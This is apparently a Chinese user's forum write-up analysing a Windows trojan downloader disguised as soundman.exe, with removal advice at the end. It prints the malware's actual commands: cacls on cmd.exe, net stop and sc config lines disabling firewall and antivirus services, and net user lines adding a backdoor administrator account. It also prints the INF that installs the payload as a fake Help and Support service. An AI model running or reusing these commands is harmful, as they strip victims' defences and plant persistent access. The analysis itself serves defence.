电脑裸奔一段时间后不幸感染此病毒,在通过sre,arswp2,等常规操作后,基本恢复正常,但另我郁闷的是,时间不久以后,SSM系统防火墙软件提示soundman.exe有动作,开始我以为是声卡驱动的问题,就没放在心上,当时随着进程里出现cmd.exe我才发现问题来了,终于在反复尝试中找到了原因:
病毒动作:
1,删除旧版本的病毒然后释放以下文件
%windir%\soundman.exe(罪魁祸首,病毒主程序,木马下载器,图标和常见的soundman程序一样)
%windir%\system32\ttjj3.ini
%windir%\system32\interne.exe
%windir%\system32\qoq.exe (这个应该是PR端口扫描工具)
%windir%\system32\notepde.exe
2,通过进程枚举,关闭以下进程
shstat.exe(MCAFEE桌面图标进程)
runiep.exe
ras.exe
MPG4C32.exe
imsins.exe
Iparmor.exe
360safe.exe(360安全卫士主进程)
360tray.exe
kmailmon.exe
kavstart.exe
avp.exe(卡巴斯基主进程)
ccenter.exe
3,通过rtcShell运行cacls获取cmd.exe的权限,然后通过net stop sc 命令来关闭一些服务,并创建一个new1的管理员帐号
cacls.exe C:\winnt\system32\cmd.exe /e /t /g everyone:F
net stop wscsvc
net stop sharedaccess
sc config sharedaccess start= disabled
sc config wscsvc start= disabled
net stop KPfwSvc
net stop KWatchsvc
net stop McShield
net stop "Norton AntiVirus Server"
net user new1 12369 /add
net user new1 12369
net user new1 /active:yes
net localgroup administrators new1 /add
4.映象挟持kmailmon.exe,任务管理器等正常程序 ,其中挟持ctfmon来启动病毒程序soundman.exe
360Loader.exe
360Safe.exe
360tray.exe
IceSword(冰刃)
ctfmon.exe(系统输入法)
Iparmor.exe
kmailmon.exe
iparmor.exe
ras
runiep
taskmgr.exe(WINDOWS任务管理器)
5,尝试删除一些安全软件的启动项目,(个人判断如果删除不了就进行映像劫持)
hkey_local_machine\software\microsoft\windows\currentversion\run\360safetray
hkey_local_machine\software\microsoft\windows\currentversion\run\kavstart
hkey_current_user\software\microsoft\windows\currentversion\run\kavpfw
hkey_local_machine\software\microsoft\windows\currentversion\run\vptray
hkey_local_machine\software\microsoft\windows\currentversion\run\kav
hkey_local_machine\software\microsoft\windows\currentversion\run\runeip
hkey_local_machine\software\microsoft\windows\currentversion\run\ravtask
hkey_local_machine\software\microsoft\windows\currentversion\run\rfwmain
6,重命名ieprot.dll为iepret.dll,safemon.dll为safemes.dll 估计重启以后不能运行了
7,生成1.inf通过rundll32.exe安装为服务Help and Support(注意这个本身是系统帮助支持中心但是被病毒替换了)
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=helpsvc,,My_AddService_Name
[My_AddService_Name]
DisplayName=Help and Support
Description=启用在此计算机上运行帮助和支持中心。如果停止服务,帮助和支持中心将不可用。如果禁用服务,任何直接依赖于此服务的服务将无法启动。
ServiceType=0x10
StartType=2
ServiceBinary=%11%\interne.exe
ErrorControl=0
8.上传中招者的ip地址到病毒作者的服务器 下载盗号木马机器狗病毒等病毒文件,并通过端口扫描工具PR扫描局域网和IP段 135
端口是否有打开 保存在C:\Por.aed文件中
/rc/zj/gx.jpg 貌似是自我更新啊
ssave.jpg
notepde.jpg 加了一个未知壳,似乎是一个远程控制木马
/and/1.exe
.....
/and/11.exe(11-19链接失效了)
/and/19.exe
.....
/and/25.exe
解决思路
1,扫描sreng日志或者清理专家日志找出注入到进程中的病毒模块
2,使用费尔木马文件删除工具导入病毒文件列表删除
3,如果explorer.exe userinit之类的系统文件被修改的,可以狗狗百度下载修复文件
4,重启后使用杀毒软件查杀病毒,使用清理专家修复病毒残余
